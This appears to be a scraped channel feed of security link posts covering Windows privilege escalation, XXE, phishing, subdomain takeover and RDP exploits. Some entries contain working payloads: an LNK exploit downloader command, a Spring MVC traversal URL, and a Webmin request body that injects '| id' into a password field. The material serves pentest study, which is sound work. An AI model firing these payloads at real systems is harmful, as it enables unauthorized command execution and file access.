Escalating a Windows user's privileges to SYSTEM by abusing Osquery
CVE-2019-3567
https://offsec.provadys.com/osquery-windows-acl-misconfiguration-eop.html
#windows
#privesc
#pentest
@sec_nerd
Red Team Techniques: Gaining access on an external engagement through spear-phishing
https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
#phishing
#spear_phishing
#msf
@sec_nerd
Bypassing Windows User Account Control: Back For More
https://medium.com/@z3roTrust/bypassing-windows-user-account-control-back-for-more-dd5672c48600
#windows
#pentest
#privesc
@sec_nerd
Automating local DTD discovery for XXE exploitation
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation
#xxe
#web
#pentest
@sec_nerd
A Deep Dive into XXE Injection
https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
#xxe
#web
#pentest
@sec_nerd
CVE-2019-13382: Local Privilege Escalation in SnagIt
https://posts.specterops.io/cve-2019-13382-local-privilege-escalation-in-snagit-abe5f31c349
#windows
#pentest
#privesc
@sec_nerd
LNK Exploit
https://github.com/mortychannel/lnkexploit
Usage:
python lnk.py -p download -l https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe -s payload.exe -i 1
POC:
https://youtu.be/AWGL28Qk4bA
#windows
#pentest
#exploit
@sec_nerd
[PoC] Analysis of Spring MVC Directory Traversal Vulnerability (CVE-2018-1271)
https://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
https://paper.seebug.org/991/
#exploit
#Poc
@sec_nerd
PowerShell: Get Last Domain Logon with Get-ADUserLastLogon
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
The basics of attacking the subdomains of large websites
https://blog.cystack.net/subdomain-takeover/
https://blog.cystack.net/subdomain-takeover-chapter-two-azure-services/
#web
#pentest
#bugbounty
#subdomain
@sec_nerd
CyStack Security Blog
Subdomain takeover - Chapter one: Methodology
Subdomain takeover is a high severity vulnerability that can be exploited to
take control of a domain and pointing it to an address managed by attackers.
Attacks on this vulnerability are often used for the purpose of creating
phishing sites, spreading malwares.…
"Webmin 0day remote code execution"
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
Alternative methods for obtaining SYSTEM-level access on Windows
https://blog.xpnsec.com/becoming-system/
#windows
#privesc
#pentest
@sec_nerd
Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708
https://github.com/dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-
#windows
#rdp
#rce
@sec_nerd